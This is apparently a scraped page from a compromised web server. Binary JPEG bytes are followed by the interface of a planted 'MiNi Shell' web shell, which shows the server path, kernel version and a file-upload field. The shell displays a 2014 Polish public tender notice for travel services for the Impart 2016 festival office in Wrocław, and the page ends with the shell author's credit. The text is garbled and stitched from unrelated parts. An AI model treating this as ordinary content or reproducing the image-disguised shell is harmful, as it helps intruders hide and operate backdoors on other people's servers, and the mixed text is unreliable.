JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140321/60669-N-2014.html

<p class="kh_header"><b>Wrocław: Kompleksowa obsługa podróży krajowych i zagranicznych na potrzeby Biura Festiwalowego Impart 2016 we Wrocławiu</b><br>
<b>Numer ogłoszenia: 60669 - 2014; data zamieszczenia: 21.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biuro Festiwalowe Impart 2016 , ul. Komuny Paryskiej 39-41, 50-451 Wrocław, woj. dolnośląskie, tel. 71 343 29 62, faks 71 343 29 62.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.impart.art.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługa podróży krajowych i zagranicznych na potrzeby Biura Festiwalowego Impart 2016 we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie sukcesywnych,  kompleksowych  usług w zakresie: 
        1) rezerwacji i sprzedaży wraz z dostawą biletów lotniczych na międzynarodowe i krajowe przewozy 
             lotnicze,
        2) rezerwacji i sprzedaży wraz z dostawą biletów kolejowych  na krajowe i międzynarodowe przewozy 
             kolejowe,
3) obsługi wizowej, polegającej na każdorazowym poinformowaniu Zamawiającego o wszelkich wymogach formalnych dotyczących planowanych przez Zamawiającego podróży, a następnie na wniosek Zamawiającego,  dopełnieniu wszelkich formalności zakresie wnioskowania, zakupu wraz  z dostawą wiz w przypadku podróży zagranicznych do krajów wymagających wiz,
       4)  obsługi brokerskiej, polegającej na każdorazowym poinformowaniu Zamawiającego o wszelkich   
             wymogach formalnych dotyczących planowanych przez Zamawiającego podróży w zakresie 
             ubezpieczeń, a następnie  zakupu  wraz z dostawą, na wniosek Zamawiającego, polis 
             ubezpieczeniowych w wariancie standardowym  reszta świata - w ramach podróży do krajów  poza 
             Unią Europejską, obejmujących co najmniej koszty leczenia i transportu medycznego oraz 
             następstwa nieszczęśliwych wypadków zaś w ramach wszelkich podróży poza obszar Polski -
             dodatkowo ubezpieczenie bagażu podróżnego od utraty lub zniszczenia - na warunkach  
             każdorazowo określanych  przez Zamawiającego w szczegółowym zamówieniu.
 2.W ramach realizacji zamówienia przewiduje się zakup:
      1)  150 biletów lotniczych  ( 50 na trasach krajowych, 100 na trasach zagranicznych )  - tam i z 
           powrotem lub w jedną stronę, 
      2) 90 biletów kolejowych ( 30 na trasach krajowych, 60 na trasach zagranicznych ) - tam i z 
           powrotem lub w jedną stronę, 
      3) 10 wiz,
      4) 30 polis ubezpieczeniowych ( dla jednej osoby, prognozowany czas podróży: 3 - 5 dni ). 
     Zamawiający zastrzega, iż podane powyżej ilości są ilościami prognozowanymi. Faktyczna ilość 
     zamawianych usług zależeć będzie od rzeczywistych potrzeb Zamawiającego, tj. może ulec zmniejszeniu 
     lub zwiększeniu w ramach środków przeznaczonych na realizację niniejszego zamówienia.
 3.Wykonawca zapewni możliwość realizacji zadań dotyczących  niniejszego zamówienia przez wszystkie 
     dni robocze, przez które rozumienie się dni poza niedzielami oraz dniami ustawowo wolnymi od pracy, 
     co najmniej w godzinach 08.00-16.00 oraz wyznaczy pracowników, numery telefoniczne oraz adres 
     e-mail do kontaktu z pracownikami Zamawiającego.
 4.Realizacja usług objętych niniejszym zamówieniem odbywać się będzie zgodnie z rzeczywistymi 
     potrzebami  Zamawiającego na podstawie zamówień składanych do Wykonawcy e-mailem, faksem  lub  
     w szczególnych przypadkach - telefonicznie.
5.Wykonawca zobowiązuje się do:
    1)    przedstawienia Zamawiającemu niezwłocznie, nie później jednak niż następnego dnia od złożenia 
            zamówienia:
a)	minimum dwóch  ( jeżeli występują ) najkorzystniejszych wariantów podróży z  określeniem warunków podróży dotyczących najkorzystniejszych połączeń z uwzględnieniem: czasu  rozpoczęcia i zakończenia podróży, ewentualnych przesiadek i przerw w podróży, cen biletów oraz warunków taryfy,
b)	wszelkich ewentualnych wymogów wizowych dotyczących celu podróży wskazanego przez Zamawiającego, 
c)	minimum dwóch ( jeżeli występują )  najkorzystniejszych propozycji polis ubezpieczeniowych dotyczących podróży objętej zamówieniem.
 2) rezerwacji połączeń lotniczych i sprzedaży biletów lotniczych oraz kolejowych, przedstawiając różne 
     warianty połączeń z uwzględnieniem: 
        a) warunków podróży określonych przez Zamawiającego, 
        b) bezkolizyjnej relacji połączeń wieloetapowych i najkrótszego łącznego czasu połączeń na danej  
            trasie ( z uwzględnieniem przerw między lotami),
        c) najkorzystniejszych cen i promocji obowiązujących w dniu wystawienia biletu, w tym najniższych z 
            dostępnych taryf  publikowanych i stawek negocjowanych oraz stawek promocyjnych, w klasach 
            wymaganych przez Zamawiającego, a w przypadku biletów lotniczych - także z uwzględnieniem 
            oferty tzw. tanich linii lotniczych,
    3) w przypadku ustalenia przez Zamawiającego możliwości zakupu biletów po cenach niższych, niż 
        oferowane przez Wykonawcę - do sprzedaży biletów po korzystniejszych cenach,
    4) każdorazowego powiadamiania Zamawiającego drogą elektroniczną o dokonanej rezerwacji
        i informowania o ostatecznym  terminie wykupu biletu na warunkach określonych w rezerwacji, 
    5)  w przypadku , gdy procedura wizowa przewiduje konieczność przeprowadzenia sformalizowanego 
         postepowania ( nie dotyczy wiz kupowanych na lotnisku ),  reprezentowania osoby  wskazanej przez 
         Zamawiającego  przed organami wizowymi , w tym wypełnienia stosownego wniosku , zebrania 
         niezbędnej dokumentacji stanowiącej załączniki do wniosku , złożenia i opłacenia wniosku przed 
         organem wizowym, prowadzenia korespondencji z organem ,  odbioru i dostarczeni Zamawiającemu  
         decyzji wydanej w efekcie rozpatrzenia wniosku, w razie konieczności na Wykonawca wykona 
         wymienione w niniejszym punkcie czynności na  podstawie stosownego pełnomocnictwa,
    6) bezpłatnego dostarczania, na koszt i ryzyko Wykonawcy - biletów lotniczych i kolejowych  oraz wiz i 
        polis w wersji wybranej przez Zamawiającego, w formie przyjętej dla danego dokumentu,  w miejsce 
        wskazane przez Zamawiającego, z zastrzeżeniem, iż bilety lotnicze wystawiane będą w formie 
        e-biletów lub w formie papierowej w zależności od przyjętej przez przewoźnika formy sprzedaży i 
        przesyłane na wskazane przez Zamawiającego adresy pocztowe lub e-mail  w terminach uzgodnionych 
        przez strony gwarantujących planowane rozpoczęcie podróży,
   7)  bezzwłocznego  informowania Zamawiającego, co najmniej drogą elektroniczną, o wszystkich 
        zmianach dotyczących planowanej podróży,  w tym zarezerwowanych  lub wykupionych biletów,
   8) w zakresie zakupu biletów lotniczych przejęcia obowiązków dotyczących składania ewentualnych 
        odwołań  i reklamacji do przewoźników, a zwłaszcza do reprezentowania Zamawiającego w sprawach 
        reklamacji dotyczących przewozów realizowanych na podstawie sprzedanych biletów, a w 
        szczególności w przypadku zwrotu biletów  niewykorzystanych z winy przewoźnika lub ze względów 
        losowych,
6. Zamawiający ma prawo do: 
    1) dokonania, w sytuacjach nie dających się wcześniej przewidzieć, rezygnacji z usługi wizowej, 
        zakupienia polisy, odwołania rezerwacji lub zmiany rezerwacji  ( w odniesieniu do klasy, czasu, 
        terminu, trasy podróży oraz danych pasażera )  lub dokonania rezygnacji z zakupionego biletu - na 
        warunkach określonych w taryfach przewoźników oraz rezygnacji z zakupionej polisy - na warunkach 
        ubezpieczyciela. Jeżeli zmiana rezerwacji wiązać się będzie z koniecznością dokonania ponownej 
        rekalkulacji ceny, Zamawiający zobowiązany będzie do pokrycia powstałej z tego tytułu niedopłaty, zaś 
        Wykonawca do zwrotu ewentualnej nadpłaty.  Wykonawca nie będzie przy tym pobierał żadnych 
        dodatkowych opłat  manipulacyjnych,
    2) zwiększenia lub zmniejszenia ilości rezerwacji, zakupu i dostawy biletów, wiz i polis pod warunkiem 
        nie przekroczenia kwoty przeznaczonej na realizację zamówienia,
    3) weryfikacji wariantów  polis,  lotów i połączeń  oraz porównywania cen biletów oferowanych przez 
        Wykonawcę z cenami polis/ biletów oferowanych przez inne biura lub przez przewoźników w 
        sprzedaży bezpośredniej, w tym przez internet oraz żądania od  Wykonawcy, w wypadku stwierdzenia, 
        iż proponowane połączenia i/lub ceny polis/ biletów nie są najkorzystniejsze - przedstawienia nowych 
        propozycji lub sprzedaży biletów po korzystniejszych cenach.
7. Pozostałe warunki dotyczące realizacji zamówienia, w tym warunki płatności, zostały określone w 
    Projekcie umowy - Załącznik nr 4 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 63.51.20.00-1, 63.51.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia ( załącznik nr 2.1 do SIWZ ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony,  jeżeli wykonawca wykaże, że wykonał, a w przypadku świadczeń 
             okresowych lub ciągłych wykonuje, w okresie ostatnich 3 ( trzech ) lat przed upływem terminu 
             składania ofert, a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
             co najmniej jedną usługę związaną swoim rodzajem z usługą stanowiącą przedmiot niniejszego
             zamówienia o wartości nie mniejszej niż 150.000,00 zł  brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia ( załącznik nr 2.1 do SIWZ ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia ( załącznik nr 2.1 do SIWZ ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia ( załącznik nr 2.1 do SIWZ ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku polegania na wiedzy i doświadczeniu innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego winien wskazywać także 
zakres i okres udziału innego podmiotu przy wykonaniu zamówienia.
2. Jeżeli Wykonawcę reprezentuje pełnomocnik, do oferty należy załączyć pełnomocnictwo określające zakres pełnomocnictwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)  Zamawiający  przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, 
       na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej  jednej z 
       okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
        a) w sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy i mających charakter 
            zmian nieistotnych tj. nie odnoszących się do warunków, które gdyby zostały ujęte w ramach 
            pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która 
            została pierwotnie dopuszczona,
        b) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na 
            realizację przedmiotu zamówienia, w tym w szczególności w przypadku ustawowej zmiany stawki 
            podatku VAT,
      c)  gdy zmiany są korzystne dla Zamawiającego, a w szczególności gdy spowodują obniżenie   
 ponoszonych przez Zamawiającego kosztów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.impart.art.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Festiwalowe Impart 2016, ul. Mazowiecka 17, 50-412 Wrocław, pok. 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2014 godzina 10:00, miejsce: Biuro Festiwalowe Impart 2016, ul. Komuny Paryskiej 39-41, 50-451 Wrocław, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com